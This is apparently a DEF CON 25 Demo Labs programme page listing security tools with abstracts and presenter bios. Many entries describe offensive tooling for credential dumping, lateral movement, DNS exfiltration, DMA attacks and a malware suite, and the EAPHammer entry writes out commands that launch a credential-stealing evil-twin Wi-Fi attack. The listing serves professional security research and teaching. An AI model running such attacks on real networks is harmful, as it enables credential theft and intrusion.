skip to main content

DEF CON 25 Hacking Conference

Demo Labs

Demo Labs

Android Tamer

Anant Shrivastava

Saturday from 1000-1150 at Table Three

Audience: Mobile (specifically Android)

Android Tamer is a project to provide various resources for Android mobile application and device security reviews. Be it pentesting, malware analysis, reverse engineering or device assessment. We strive to solve some of the major pain points in setting up the testing environments by providing various ways and means to perform the task in most effortless manner.

https://androidtamer.com/

Anant Shrivastava
Anant Shrivastava is an information security professional with nearly 10 years of hacking and teaching experience, with expertise in Mobile, Web Application, Networks and Linux Security. He is Regional Director Asia Pacific for NotSoSecure Global Services and has lead hacking training at some of the worlds top security conferences (BlackHat USA/EU/ASIA, Nullcon, g0s, c0c0n). Anant also leads Open Source project AndroidTamer (www.androidtamer.com) and CodeVigilant (www.codevigilant.com).

Back to top



Bropy

Matt Domko

Saturday from 1400-1550 at Table Five

Provides simple anomaly based IDS capabilities using Bro. Bropy parses logs to generate network baselines using a simple Y/N interface, and the accompanying bro script generates logs for traffic outside of the baseline.

https://github.com/hashtagcyber/bropy

Matt Domko
"I'm just a guy playing with Legos. I crudely assemble the knowledge I have to build a solution for my problems."

Matt Domko is currently an Information Security instructor for Chiron Technology Services in Augusta, Georgia. His experiences as an enterprise administrator and cyber network defender for the United States Army are what drive his passion for network defense and "Blue Teaming". Bikes, Beards, and Karaoke

Back to top



bullDozer

Keith Lee

Saturday from 1400-1550 at Table Two

Audience: Offense

The tool allows you to supply a username and password that you have captured and cracked from Responder or other sources as well as an IP ranges, subnet or list of IP addresses.

The tool finds its way around the network and attempts to gain access into the hosts, finds and dumps the passwords/hashes, resuses them to compromise other hosts in the network.

Below are some of the places the tools look for hashes/passwords
1. SYSVOL
2. File Shares
3. Memory
4. Tokens (Incognito)
5. MSSQL service credentials
6. Unattend.xml, sysprep.xml, sysprep.inf

It will also exploit the Domain Controller if its vulnerable to MS14-069 and dump the hashes.
Pillaging the Corporate Network
The tool will also attempt to 'rob' the shares and hosts of the sensitive data/information.
1. Finding files whose filename have the word 'password' in it
2. Dump Wireless. WinVNC, UltraVNC, Putty, SNMP, Windows AutoLogon, Firefox Stored credentials,
3. Find KeePass Databases, FileZilla sitemanger.xml, Apache Httpd.conf, and etc. if they contain credentials.
4. Finding PII data and Credit Card Track Data from memory
5. Browser credentials

It will iterate and continue to test and exploit the systems until all hosts are compromised. Another useful feature is for attackers who want to find the right credentials in order to access a certain folder under the shares on the host.

For example, \\host1\share\private

You might have the account that allows you to access \\host1\share but you do not know which account you need to access \\host1\share\private.

Using the credentials the tool has captured and finds the 'right key' to the lock.

It is possible to disable any of the options (e.g. no memory search of PAN numbers) so to add a random delay to its operations so as to remain stealth.

We are planning to allow users to develop modules/plugins and encourage development so that its feature set can be extended.

Keith Lee
Keith Lee is a Senior Security Consultant with Trustwave's SpidersLabs Asia-Pacific. SpiderLabs is one of the world's largest specialist security teams, with over 100 consultants spread across North America, South America, Europe and the Asia Pacific. SpiderLabs has a focus on original security research and regularly presents at conferences such as BlackHat, DefCon, OWASP, Hack In The Box and Ruxcon. Keith is based out of Singapore and has primary focus is on providing penetration testing, social engineering and incident response services to clients in the Asia-Pacific region.

Back to top



CellAnalysis

Pedro Cabrera

Saturday from 1600-1750 at Table Three

Audience: Defensive and mobile security

CellAnalysis is one more tool to be added to the pentester arsenal. Nowadays we can find other tools intended to find fake cells, most of them use active monitoring; that is, they monitor traffic coming to the SIM card on a smart phone, so that only cell attacks are scanned on the same network as the SIM card. CellAnalysis offers a different vision, it performs a passive traffic monitoring, so it does not require a SIM card or a mobile device, simply a OsmocomBB phone or compatible device SDR (rtlsdr, usrp, hackrf or bladerf) to start monitoring all the frequencies of the GSM spectrum.

http://www.fakebts.com/

Pedro Cabrera
Software Defined Radio and UAV enthusiast, Pedro Cabrera has worked over than 10 years in the main Spanish telecommunications operators, conducting security audits and pentesting in mobile and fixed networks. Besides working with the telecommunications operators, Pedro leads Open Source projects such as intrusion detection systems for GSM networks, which has led him to study the various fake 2G cells attacks and existing solutions. He has also collaborated in press articles on this topic, wardriving around Madrid City looking for how many and where fake stations can be found just walking. During this year he has participated in security events, training "Attacking 2G/3G Mobile Networks, Smartphones and Apps" (BlackHat Asia) and demonstrating how to remote inject commands to commercial drones; "All your bebop drones still belong to us: drone hijacking" (RootedCon) and showing how to intercept 2G calls and SMS under a frequency channel hopping network, using low cost SDR; HackRF and BladeRF.

Back to top



https://crack.sh/

David Hulton

Ian Foster

Saturday from 1200-1350 at Table Two

Audience: Offense, Mobile, Hardware

Cracking DES has been doable for state actors for the past few decades, but most people don't have access to a supercomputer or $100k of dedicated hardware laying around. In 2012, Moxie Marlinspike and David Hulton released a service for Cloudcracker.com to provide this to the masses for 100% success rate cracking of MSCHAPv2 (PPTP VPNs & WPA-Enterprise). Since then Cloudcracker.com has vanished, but ToorCon has taken over and released https://crack.sh, with added features for cracking MSCHAPv1 (Windows Lanman/NTLMv1 login), Kerberos Authentication, and a general purpose interface for cracking other systems that still use DES. We will also be releasing a free real-time service for cracking DES (in ~3 seconds) with chosen-plaintext, providing a full break of Windows Lanman/NTLMv1 authentication and allow people to test their devices to see if they're doing proper WPA-Enteprise certificate checking.

https://crack.sh/

David Hulton
David Hulton organizes the ToorCon suite of conferences and has spent nearly 20 years doing security research mostly focused on reverse engineering and cracking crypto. He's mostly known for developing the bsd-airtools wireless attack tools in the early 2000's, developing and presenting the first practical attack on GSM a5/1 in 2008, and releasing a DES cracking service and tools to perform a full break of MSCHAPv2 authentication in 2012.

Ian Foster

Back to top



CrackMapExec

Marcello Salvati

Saturday from 1400-1550 at Table Three

Audience: Network Defense and Offense

Ever needed to pentest a network with 10 gazillion hosts with a very limited time frame? Ever wanted to Mimikatz entire subnets? How about shelling entire subnets? How about dumping SAM hashes ? Share spidering? Keeping track of all the credentials you pillaged? (The list goes on!) And doing all of this in the stealthiest way possible? Well look no further than CrackMapExec! CrackMapExec (a.k.a CME) is a modular post-exploitation tool written in Python that helps automate assessing the security of *large* Active Directory networks. Built with stealth in mind, CME follows the concept of "Living off the Land": abusing built-in Active Directory features/protocols to achieve it's functionality and allowing it to evade most endpoint protection, IDS and IPS solutions. Although meant to be used primarily for offensive purposes, CME can be used by blue teams as well to assess account privileges, find misconfigurations and simulate attack scenarios. In this demo the author will be showing off v4.0, a major update to the tool bringing more feature and capabilities than ever before! If you are interested in the latest and greatest Active Directory attacks/techniques, weaponizing them at scale and general cool AD stuff this is the demo for you!

https://github.com/byt3bl33d3r/CrackMapExec

Marcello Salvati
Marcello Salvati (@byt3bl33d3r) is a security consultant who's really good at writing bios. He's so good at writing bios that he was awarded the 'The Best Bio Ever from *insert date when bios became a thing* to 2017" award. (Totally legit award. Don't Google it, Bing it).

His boss Liz asked him about ten times to re-write his bio because "It was too good. He had to make it less good. We didn't want people to cry in shame when they read it. It was like a poem ... sniff.. *a single tear is shed*".

By day a security consultant, by night a tool developer who discovered a novel technique to turn tea, sushi and dank memes into somewhat functioning code he has recently devoted his attention to the wonderful rabbit hole that is Active Directory which has become his favorite thing to 0wn.

Back to top



Crypt-Keeper

Maurice Carey

Saturday from 1400-1550 at Table Four

Audience: Anyone who wants to run a service to securely exchange files.

Crypt-Keeper is a service for securely exchanging files.

Equipment Requirements (Network Needs, Displays, etc): A display or protector would be great. The app will be running on AWS, so a network connection will be needed as well.

https://github.com/mauricecarey/crypt-keeper

Maurice Carey
"Maurice is the Principle Software Engineer at TargetSmart, a small company focused on big data problems, where he is helping create and scale their customer facing software platform for future business growth. Previously, Maurice has worked as a Software Architect focusing on data analytics and micro-services, and as a software engineer at companies like General Motors and Amazon.com.

Maurice has been a speaker or presenter publicly at many local meet ups and small conferences, as well as presenting papers at the IEEE International Conference on Program Comprehension (ICPC), and IEEE Enterprise Distributed Object Computing (EDOC) conferences.

Maurice received a Bachelor's Degree in Computer Science and PhD in Computer Science from Arizona State University while establishing himself as an entrepreneur working his way through school writing code for various clients.

Back to top



DNS-Exfil-Suite

Nolan Berry

Cory Schwartz

Saturday from 1600-1750 at Table Two

Audience: I think the best audience here would be PenTesters, DNS Engineers and people looking to learn more about DNS based attack methods.

Our tool kit provides multiple methods of data exfiltration, infiltration and botnet command and control systems using 100% DNS traffic that is either hard to detect or impossible to detect.

https://github.com/ndberry/DNS_Exfil_Tool

Nolan Berry
DNS Engineer
-----------
Nolan has been working with DN for 2 years and has always been very interested in security. His passion for both security and DNS has led him to work and develop a platform for DNS exploitation in an attempt to raise awareness of known but under appreciated security flaws.

Cory Schwartz
Site Reliability Engineer
Twitter
----------
Cory has a past working on signals intelligence and processing after graduating with a degree in cryptography he served in the Air Force and then as a government contractor helping the intelligence community. After that he worked at Rackspace on CloudStorage and systems automation. Now he is an SRE at Twitter in San Fransisco.

Back to top



EAPHammer

Gabriel Ryan

Saturday from 1600-1750 at Table Five

Audience: Offensive security professionals, red teamers, penetration testers, researchers.

EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks. It is designed to be used in full scope wireless assessments and red team engagements. As such, focus is placed on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual configuration. To illustrate how fast this tool is, here's an example of how to setup and execute a credential stealing evil twin attack against a WPA2-TTLS network in just two commands:

# generate certificates
./eaphammer --cert-wizard

# launch attack
./eaphammer -i wlan0 --channel 4 --auth ttls --wpa 2 --essid CorpWifi --creds

Features:
* Steal RADIUS credentials from WPA-EAP and WPA2-EAP networks.
* Perform hostile portal attacks to steal AD creds and perform indirect wireless pivots
* Perform captive portal attacks
* Built-in Responder integration
* Support for Open networks and WPA-EAP/WPA2-EAP
* No manual configuration necessary for most attacks.
* No manual configuration necessary for installation and setup process

https://github.com/s0lst1c3/eaphammer

Gabriel Ryan
Gabriel Ryan is a security consultant and researcher with a passion for wireless and infrastructure testing. He currently works for Gotham Digital Science at their New York office, where he provides full scope red team penetration testing capabilities for a diverse range of clients. He also contributes heavily to his company's research division, GDS Labs. Previously, Gabriel has worked as a penetration tester and researcher for the Virginia-based defense contractor OGSystems, and as a systems programmer for Rutgers University. He also is a member of the BSides Las Vegas senior staff, coordinating wireless security for the event. In his spare time, he enjoys live music, exploring the outdoors, and riding motorcycles.

Back to top



Fuzzapi

Abhijeth Dugginapeddi

Lalith Rallabhandi

Srinivas Rao

Saturday from 1000-1150 at Table One

Audience: AppSec, Web/Mobile Developers, DevOps

Fuzzapi is a REST API pen testing tool that automatically does a bunch of checks for vulnerabilities on your APIs. Rather than a tool that only identifies vulnerabilities in web services, we have built a platform that enables everyone to test and understand a large range of API vulnerabilities that exist in both web and mobile applications. After seeing the benefits of Automating REST API pen testing using a basic Fuzzapi tool, the authors have decided to come up with a better version which can automatically look into vulnerabilities in APIs from the time they are written. REST APIs are often one of the main sources of vulnerabilities in most web/mobile applications. Developers quite commonly make mistakes in defining permissions on various cross-platform APIs. This gives a chance for the attackers to abuse these APIs for vulnerabilities. Fuzzapi is a tool written in Ruby on Rails which helps to quickly identify such commonly found vulnerabilities in APIs which helps developers to fix them earlier in SDLC life cycle. The first released version of the tool only has limited functionalities however, the authors are currently working on releasing the next version which will completely automate the process which saves a lot of time and resources.

https://www.youtube.com/watch?v=43G_nSTdxLk&t=321s

Abhijeth Dugginapeddi
Abhijeth D (@abhijeth) is a Security Consultant working for a bank in Australia. Previously worked with Adobe Systems, TCS and Sourcenxt. Security Enthusiast in the fields of Penetration Testing, Application/Mobile/Infrastructure Security. Believes in need for more security awareness and free responsible disclosures. Got lucky in finding few vulnerabilities with Google, Yahoo, Facebook, Microsoft, Ebay, Paypal, etc and one among Top 5 researchers in Synack a bug bounty platform. Also interested in Social media Marketing, Digital Marketing and Web designing.

Lalith Rallabhandi
Lalith Rallabhandi (@lalithr95) currently works as a Security Intern at Shopify. He has previously worked with Hackerrank, Zomato and Google Summer of Code. Likes to code, break stuff mostly with web applications and is a Ruby on rails Enthusiast. Found bugs with Google, Microsoft, Facebook, Badoo, Twitter etc.

Srinivas Rao

Back to top



GibberSense

Ajit Hatti

Saturday from 1000-1150 at Table Two

Audience: Cryptologers, crypt analysts, forensic investigators, developers and testers.

On your forensics and investigation assignment found a Gibberish string or unknown file and dont know what is it? Throw it to GibberSense, it might try to make some sense out of it.

Not sure if a file is encrypted, encoded or obfuscated using substitution ciphers? Gibbersense can give you statistical analysis of the contents and gives you direction for further investigation and also gives you an excellent visualization.

Being an extensible framework, Gibbersense gives tools for simple xor encryption, frequency analysis, which gives basic cryptanalysis capabilities.

An Open Source Initiative GibberSense is an experimental tool for improving investigations.

https://github.com/smxlabs/gibbersense

Ajit Hatti
Ajit Hatti has been contributing on secure usage of cryptography from past 5 years and currently focusing on the security issues of BlockChain related Technologies. He is an author of LAMMA & GibberSense tools which help in securing crypto and PKI Implementatinos.

Ajit is founder of SecurityMonx and is also working in collaboration with Payatu on futuristic projects. He also co-founded Null Open Security Community and has worked with Symantec, Emerson, ZScaler, IBM and Bluelane as a Security Researcher.

Ajit has presented his work at BlackHat DEFCON Crypto-n-Privacy Village and organizes Nullcon in India. He loves to Run & Volunteer at BSides LV and organizes The World Run by Hackers.

Back to top



GoFetch

Tal Maor

Sunday from 1000-1150 at Table Three

Audience: Enterprise, Applied Security, Windows domain, Defense and offense

GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application. The tool first loads a path of local admin users and computers generated by BloodHound and convert it to its own attack plan format. Once the attack plan is ready, it advances towards the destination according to the plan, step by step by successively apply remote code execution techniques and compromising credentials with Invoke-Mimikatz, Mimikatz and Invoke-Psexec.

A video of the Python version was published here: https://www.youtube.com/watch?v=dPsLVE0R1Tg A video of Invoke-GoFetch will be published soon. BloodHound Application - https://github.com/BloodHoundAD/BloodHound

Tal Maor
Tal Maor is a Security Researcher at Microsoft who has a passion for creating tools which makes life easy and more secured. Prior to Microsoft, Tal was developing intelligence platforms in a leading company, and previously served in the IDF intelligence unit for four years. Tal holds a B.Sc degree in Computer Science.

Back to top



GreatFET

Dominic Spill

Michael Ossmann

Saturday from 1200-1350 at Table Three

Audience: Hardware & Offense

GreatFET is an open source hardware hacking platform. In addition to support for common protocols such as SPI, USB, JTAG, and UART, GreatFET also allows us to implement arbitray protocols, as well as GPIO and acting as a logic analyser. Add on boards, known as neighbors, allow us to build on the flexibility of GreatFET and rapidly create new tools. Example neighbors include radio platforms, software defined infrared transceivers, and interfaces for hardware hacking.

Hardware: https://github.com/greatscottgadgets/greatfet Software/firmware: https://github.com/dominicgs/GreatFET-experimental

Dominic Spill
Dominic is a senior security researcher at Great Scott Gadgets, where he builds open source tools for reverse engineering communication protocols.

Michael Ossmann
Michael is a wireless security researcher who makes hardware for hackers. He founded Great Scott Gadgets in an effort to put exciting, new tools into the hands of innovative people.

Back to top



Gumbler

Willis Vandevanter

Sunday from 1200-1350 at Table Two

Audience: Offense, AppSec

The tool searches the entire commit history of a Git project for secrets and files. This is a different approach from other tools which focus on the current revision. It's excellent at digging up API keys, deleted usernames and passwords or files that are now cloaked from .gitignore.

https://github.com/BuffaloWill/gumbler

Willis Vandevanter
Willis Vandevanter is a principal at Silent Robot Systems. Prior to SRS, Will was a Senior Researcher at Onapsis and Lead Penetration Tester at Rapid7. He has previously spoken at Blackhat, DEFCON, TROOPERS, and other conferences. In his spare time, he writes code and contributes to different projects.

Back to top



HI-Jack-2Factor

Weston Hecker

Sunday from 1000-1150 at Table Six

Audience: Offense, Defense, Hardware

There are several attacks being performed on PKES Passive key entry systems on cars. Several high profile talks this year are about stealing cars using 11 Dollar SDR and cheap devices to relay the signals from the keyfob to the immobilizer: I will be demoing a device that I made using an ardunio and a 433/315 Mhz Radio and a 2.4GHZ wireless antenna They cost about 12 dollars to make and basically add two factor authentication to your vehicle.

https://eprint.iacr.org/2010/332.pdf This was the 2009 research. Here is the modern 2017 version https://www.wired.com/2017/04/just-pair-11-radio-gadgets-can-steal-car/

Weston Hecker

Back to top



LAMMA 1.0

Antriksh Shah

Ajit Hatti

Saturday from 1200-1350 at Table One

Audience: Cryptologist, crypt analysts, developers and testers, Block Chain and PKI Implements.

Last year we released LAMMA Beta at DEFCON, this year we are bringing the updated version of LAMMA with new modules for BlockChain Security Testing, auditing Trust stores, enhanced checks for source code analysis and logical flaws in crypto-coding. LAMMA 1.0 with new features & fixes makes crypto-testing more effective and smoother even for large scale implementations. You can use and enhance LAMMA 1.0, as it's a FREE and OPEN SOURCE.

http://www.securitymonx.com/products/lamma

Antriksh Shah
Antrksh is a Security Researchers from Goa. He is associated with null Open Security community and organizes Nullcon. His area of Interest are VAPT, Web app Security, Network Auditing and Forensics. Currently his research is focused on Security issues in Block Chain implementations and has contributed his work to enhance LAMMA.

Ajit Hatti
Ajit Hatti has been contributing on secure usage of cryptography from past 5 years and currently focusing on the security issues of BlockChain related Technologies. He is an author of LAMMA & GibberSense tools which help in securing crypto and PKI Implementatinos.

Ajit is founder of SecurityMonx and is also working in collaboration with Payatu on futuristic projects. He also co-founded Null Open Security Community and has worked with Symantec, Emerson, ZScaler, IBM and Bluelane as a Security Researcher.

Ajit has presented his work at BlackHat DEFCON Crypto-n-Privacy Village and organizes Nullcon in India. He loves to Run & Volunteer at BSides LV and organizes The World Run by Hackers.

Back to top



Leviathan Framework

Utku Sen

Ozge Barbaros

Sunday from 1000-1150 at Table Four

Audience: Red teamers, penetration testers (Offensive)

Leviathan is a mass audit toolkit which has wide range service discovery, brute force, SQL injection detection and running custom exploit capabilities. It consists open source tools such masscan, ncrack, dsss and gives you the flexibility of using them with a combination.

The main goal of this project is auditing as many system as possible in country-wide or in a wide IP range.

Github page: https://github.com/leviathan-framework/leviathan A blog post about it's custom exploit feature: https://www.utkusen.com/blog/wide-range-detection-of-doublepulsar-implants-with-leviathan.html

Utku Sen
Utku Sen is a security engineer working for Sony. He is the author of ransomware honeypot projects such as Hidden Tear and EDA2 which are featured in Forbes and Business Insider. Utku is mostly focused on following areas: Web application security, network security, tool development and bug hunting. He also nominated for Pwnie Awards on "Best Backdoor" category in 2016."

Ozge Barbaros
Ozge Barbaros is a security tools senior developer at Sony. Previously, she worked as GNU/Linux system administrator and as software developer at several companies in Turkey and studied Computer Engineering at Canakkale Onsekiz Mart University. She is interested in developing free software technologies.

Back to top



Maltego "Have I been pwned?"

Christian Heinrich

Saturday from 1000-1150 at Table Five

Audience: Defense

"Have I been pwned?" allows you to search across multiple data breaches to see if your email addresses or aliases has been compromised by LinkedIn, Tumblr, etc

Maltego is a link analysis application of technical infrastructure and/or social media networks from disparate sources of Open Source INTelligence (OSINT). Maltego is listed on the Top 10 Security Tools for Kali Linux by Network World and Top 125 Network Security Tools by the Nmap Project.

The integration of "Have I been pwned?" with Maltego visualises these breaches in an easy to understand graph format that can be enriched with other sources.

https://github.com/cmlh/Maltego-haveibeenpwned

Christian Heinrich
Christian Heinrich has presented at the OWASP Conferences in Australia, Europe and USA and OWASP Chapters in the Netherlands, London and Sydney and Melbourne, Australia, ToorCon (USA), Shmoocon (USA), BlackHat (Asia and USA), SecTor (Canada), CONFidence (Europe), Hack In The Box (Europe), SyScan (Singapore), B-Sides (Australia), RUXCON (Australia), and AusCERT (Australia).

Back to top



Mycroft

Joshua Montgomery

Saturday from 1400-1550 at Table One

Audience: Hardware, IoT, Automotive, AI, Everyone

Mycroft is an open source virtual assistant similar to Siri or Amazon Alexa. The technology stack allows developers to include a voice interface in anything from a Raspberry Pi to a Jaguar FTYPE sports car.

Mycroft integrates Speech-To-Text, Natural Language Processing, a Skill Framework and a Speech To Text engine into a single, easy to deploy software stack.

Though the technology runs anywhere. The company has developed a Raspberry Pi image ( Pi-Croft ) and recently deployed a Gnome Shell Extension. The company also has a hardware device the "Mark I" that comes pre-loaded with the software and includes a variety of I/O options for directly controlling devices.

http://mycroft.ai/

Joshua Montgomery
Mycroft is a team effort, but the presenter is likely to be Joshua Montgomery. Joshua is a three time entrepreneur and Air Force officer. A graduate of the University of Kansas, Joshua founded Wicked Broadband - a gigabit fiber-to-the-home ISP in Lawrence, KS. As the owner of an ISP Joshua has been an advocate for shared networks, common carriage and net neutrality. He had been featured in Wired, Forbes and ArsTechnica and has been instrumental in advocating for municipal broadband in his home state of Kansas.

Joshua started the Mycroft project because he wanted to deploy the Star Trek computer in his makerspace. He recruited a talented team of developers, ran a highly successful Kickstarter, was invited to join Techstars in 2016 and is an alum of 500 Startups.

In his capacity as and Air Force Officer Joshua serves with the 177 IAS out of Wichita Kansas. His unit is responsible for providing threat replication for the Department of Defense.

Back to top



PCILeech

Ulf Frisk

Sunday from 1200-1350 at Table Three

Total physical pwnage and plenty of live demos in this action packed Demo Lab! The PCILeech direct memory access attack toolkit was presented at DEF CON 24 and quickly became popular amongst red teamers and governments alike. A year later major operating systems are still vulnerable by default. I will demonstrate how to take total control of Linux, Windows and macOS by PCIe DMA code injection. Kernels will be subverted, full disk encryption defeated, file systems mounted and shells spawned! All this by using affordable hardware and the open source PCILeech toolkit.

http://github.com/ufrisk/pcileech

Ulf Frisk
Ulf Frisk is a hacker/penetration tester working in the Swedish financial sector. Ulf focuses mainly on online banking security, penetration testing and it-security audits during daytime and low-level coding during nighttime. Ulf has been working professionally with security since 2011 and has a dark past as a developer.

Back to top



PIV OPACITY

Christopher Williams

Saturday from 1000-1150 at Table Six

Audience: Authentication, Mobile, Embedded Security, Biohacking

OPACITY is a fast, lightweight asymmetric encryption protocol, adopted as an open standard by NIST, ANSI, and Global Platform. OPACITY, originally designed for payment and identity applications, provides a method for securing the NFC channel of low power devices with embedded secure hardware, such as smart cards. I will show an Android demonstration leveraging this open standard, as defined in NIST SP 800-73-4, to securely produce derived credentials and provide flexible and private authentication. While this demo is designed to showcase the Federal PIV standard, the OPACITY algorithm and concepts are broadly applicable to provide secure transactions in IoT, biohacking, and other low power embedded systems.

https://youtu.be/ftn8-Cth554

Christopher Williams
Dr. Christopher Williams specializes in the implementation and evaluation of information assurance and data collection techniques to solve emerging problems around transaction security and privacy in IoT, fintech, and transportation. Dr. Williams has a Ph.D. in Physics from University of Chicago, where his dissertation research focused on design, prototyping, and field deployment of novel detectors for particle astrophysics. He has diverse scientific experience with expertise in systems integration, instrumentation, experimental design, and real-time data acquisition with a focus on systematic error mitigation. He has applied his expertise to validate standards compliance in secure messaging protocols between a smart card and host; and to study the integration of commercial cryptography solutions into a government approved authentication infrastructure for mobile platforms.

Back to top



probespy

stumblebot

Sunday from 1000-1150 at Table One

Audience: offense/recon/surveillance

Probespy is a dumb and dirty tool for analyzing directed and broadcast probe request data sent by wifi client devices. It assists in locating where wireless client devices have been (geolocation) and creating behavioral profiles of the person(s) owning the device via the identification of known SSIDs.

https://github.com/stumblebot/probespy

stumblebot
Stumblebot uses computers a lot. Currently he is paid to use computers on behalf of CDW's infosec team.

Back to top



Radare2

Maxime Morin

Saturday from 1400-1550 at Table Six

Audience: A lot of people are currently using radare2 for a large panel of different purposes; binary exploitation, weird CPU architecture reversing, binary diffing, ctf, emulation, We also try to get new contributors for the projects and invite students to collaborate via various platform such as Google Summer Of Code or the Radare Summer of Code we try to organize based on donations.

Radare2 is an open-source Reverse-Engineering Framework

> Project URL: http://radare.org/r/
> Git Project URL: https://github.com/radare/radare2

Maxime Morin
French IT Security Consultant living in Amsterdam, I work for FireEye in the i3 team, performing general technical threat analysis (Malware analysis, etc.). I'm interested in Reverse Engineering especially Malware related analysis. I am a modest contributor of the project and part of the core-group, I am mainly working on the regressions-test suite and mentoring a student for Google Summer of Code for the project this year. I have already done a workshop at BSidesLV and other conferences with others contributors for example at hack.lu and "unofficial" workshops in Vegas Bars/Restaurants I also rewrote the radare book which is quick intro for radare2.

Back to top



Ruler - Pivoting Through Exchange

Etienne Stalmans

Saturday from 1200-1350 at Table Four

Microsoft Exchange has become the defacto gateway into most organisations. By nature, Exchange needs to be externally accessible, and usually falls outside of normal security monitoring. This can allow for the bypass of common security mechanisms. Even when organisations move into the cloud, their Exchange servers still provide access into the internal environment. It has been shown in the past that abusing the rules feature of Outlook, combined with auto-synchronisation through Exchange, can allow for Remote code-execution.

Furthermore, Exchange offers a covert communication channel outside of the usual HTTP or TCP employed by most malware. Using the mailbox itself, it is possible to create a communication channel that doesn't traverse the normal network boundary, and appears to be normal Exchange behaviour when inspected on the wire.

Introducing Ruler:

During our Red Team assessments, we saw an opportunity to utilise inherent weaknesses of Microsoft Exchange and create a fully-automated tool that aided further breach of the network. Ruler allows for the easier abuse of built in functionality, including the ability to execute code on every mailbox connected to the Exchange server.

This talk will showcase the numerous features of Ruler, demonstrating how to gain a foothold, pop shells on every connected mailbox, use Exchange as a covert communication channel and maintain a near invisible persistence in the organisation. We will also discuss possible defenses against the demonstarted attacks.

https://github.com/sensepost/ruler

Etienne Stalmans

Back to top



SamyKam

Salvador Mendoza

Saturday from 1200-1350 at Table Five

Audience: Offense/Defense/Hardware

SamyKam is a new project to pentest mag-stripe information designed using the Samy Kamkar's MagSpoof as base but in this case for Raspberry Pi integration. SamyKam is a portable hardware where the user can interact with it directly on the ssh, OLED, phone or browser to test magnetic card readers or tokenization processes with prepared attacks.

https://salmg.net/2017/01/16/samykam/

Salvador Mendoza
Salvador Mendoza is a security researcher focusing in tokenization processes, mag-stripe information and embedded prototypes. He has presented on tokenization flaws and payment methods at Black Hat USA, DEF CON, DerbyCon, Ekoparty, BugCON and Troopers. Salvador designed different tools to pentest mag-stripe and tokenization processes. In his designed toolset includes MagSpoofPI, JamSpay, TokenGet and lately SamyKam.

Back to top



ShinoBOT Family

Sh1n0g1

Saturday& Sunday from Saturday 1600-1750, Sunday 1200-1350 at Table Six/Five

Audience: Offense

ShinoBOT Family is a malware suite for the pentester, security engineer who want to test the vendor's solution. It contains Backdoor, Ransomware, Downloader, Dropper, PowerShell based malware, obfuscation/encryption techniques, Pseudo-DGA, and the C&C is provided as a service (C&CaaS), no fee. 5 sec to get ready and "DOWNLOAD. EXECUTE. CONTROL."

https://shinobot.com/ <- ShinoBOT executable
https://shinobotps1.com/ <- powershell edition
https://shinolocker.com/ <-ShinoLocker
https://shinosec.com/ <- other components include ShinoBOT Suite

Sh1n0g1
Security Researcher (a.k.a Hacker). 12 years on breaking security solutions.

Back to top



Advanced Spectrum Monitoring with ShinySDR

Michael Ossmann

Dominic Spill

Saturday from 1600-1750 at Table One

Audience: Wireless, Defense

We have developed open source tools to monitor the RF spectrum at a high level and then drill down to individual signals, supporting both reverse engineering and signals intelligence. By automatically combining the results with OSINT data from regulatory bodies around the world, we are able to build up a picture of devices transmitting in an environment.

http://greatscottgadgets.com/spectrummonitoring

Michael Ossmann
Michael Ossmann is a wireless security researcher who makes hardware for hackers. Best known for the open source HackRF, Ubertooth, and GreatFET projects, he founded Great Scott Gadgets in an effort to put exciting, new tools into the hands of innovative people.

Dominic Spill
Dominic Spill is senior security researcher for Great Scott Gadgets. The US government recently labelled him as "extraordinary." This has gone to his head.

Back to top



Splunking Dark Tools - A Pentesters Guide to Pwnage Visualization

Bryce Kunz @TweekFawkes

Nathan Bates (@Brutes_)

Saturday from 1200-1350 at Table Six

During a penetration test, we typically collect all sorts of information into flat files (e.g. nmap scans, masscan, recon-ng, hydra, dirb, nikto, etc) and then manually analyze those outputs to find vectors into target networks. Leveraging data analytics techniques within Splunk, pentesters will be able to quickly find the information they are looking for and hence exploit more target networks within short time periods. This talk covers the required tools for consolidating, analyzing and visualizing the dark tools that are used by every red team. We'll release the required framework for getting the data where it needs to be, the technical add-ons to ensure this data is ingested in usable formats, and dashboards for Spunk to leverage this data for mass pawnage of your target!

Bryce Kunz @TweekFawkes
Bryce Kunz (@TweekFawkes) applies his knowledge of the red-side to discover vulnerabilities which enable exploiting all the things! Currently, leading the tailored testing of Adobe's marketing cloud infrastructure to discover security vulnerabilities. As an Ex-NSA, Ex-DHS employee who hold various certifications (OSCP, CISSP, etc...) my fervor for perfection drives me to share intriguing research.

Nathan Bates (@Brutes_)
Nathan Bates (@Brutes_) applies his knowledge of the blue-side to defend against organized crime, nation-states and Bryce. Currently, leading the security centric big data initiatives for Adobe's marketing cloud infrastructure to build large scale systems for security monitoring and incident response.

Back to top



Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes

Takahiro Yoshimura (alterakey)

Ken-ya Yoshimura (ad3liae)

Sunday from 1000-1150 at Table Two

Audience: AppSec, Mobile

Trueseeing is an automatic vulnerability scanner for Android apps. It is capable of not only directly conducting data flow analysis over Dalvik bytecode but also automatically fixing the code, i.e. without any decompilers. This capability makes it resillent against basic obfuscations and distinguishes it among similar tools -- including the QARK, the scanner/explotation tool shown by Linkedin in DEF CON 23. Currently it recognizes most classes of vulnerabilities (as in OWASP Mobile Top 10 (2015).)

https://github.com/taky/trueseeing

Takahiro Yoshimura (alterakey)
TAKAHIRO YOSHIMURA: He is Chief Technology Officer at Monolith Works Inc. In 2012 METI-coodinated CTF, Challenge CTF Japan 2012, his team (Enemy10) had won local qualification round at the 1st prize. In 2013, his team (Sutegoma2) took the 6th prize in DEFCON 21 CTF. He like to read binaries and hack things. He loves a GSD.

Ken-ya Yoshimura (ad3liae)
KEN-YA YOSHIMURA: Working as Chief Executive Officer at Monolith Works Inc, he is supervising an R&D lab specializing in emerging technologies. His hacker life starts when he was 8 years old; he likes to hack MSXs, NEC PC-9800s, Sharp X68000s, Windows, Macs, iPhones, iOS/Android apps, and circumvent copyright protection (for fun,) etc. He adores a GSD.

Back to top



Universal Serial aBUSe

Rogan Dawes

Saturday from 1600-1750 at Table Four

Audience: This tool is aimed at Offensive folks, with an interest in hardware attacks.

Universal Serial aBUSe is a combination of hardware and software, and is a refinement of the old school USB HID attacks. It adds a WiFi interface to the USB device, which enables the attacker to remotely trigger the payload at a time of their choosing, not just after a fixed delay from the time it is plugged in. The WiFi interface also enables a back-channel to allow the typed payload to communicate with the attacker without touching the victim's network interfaces.

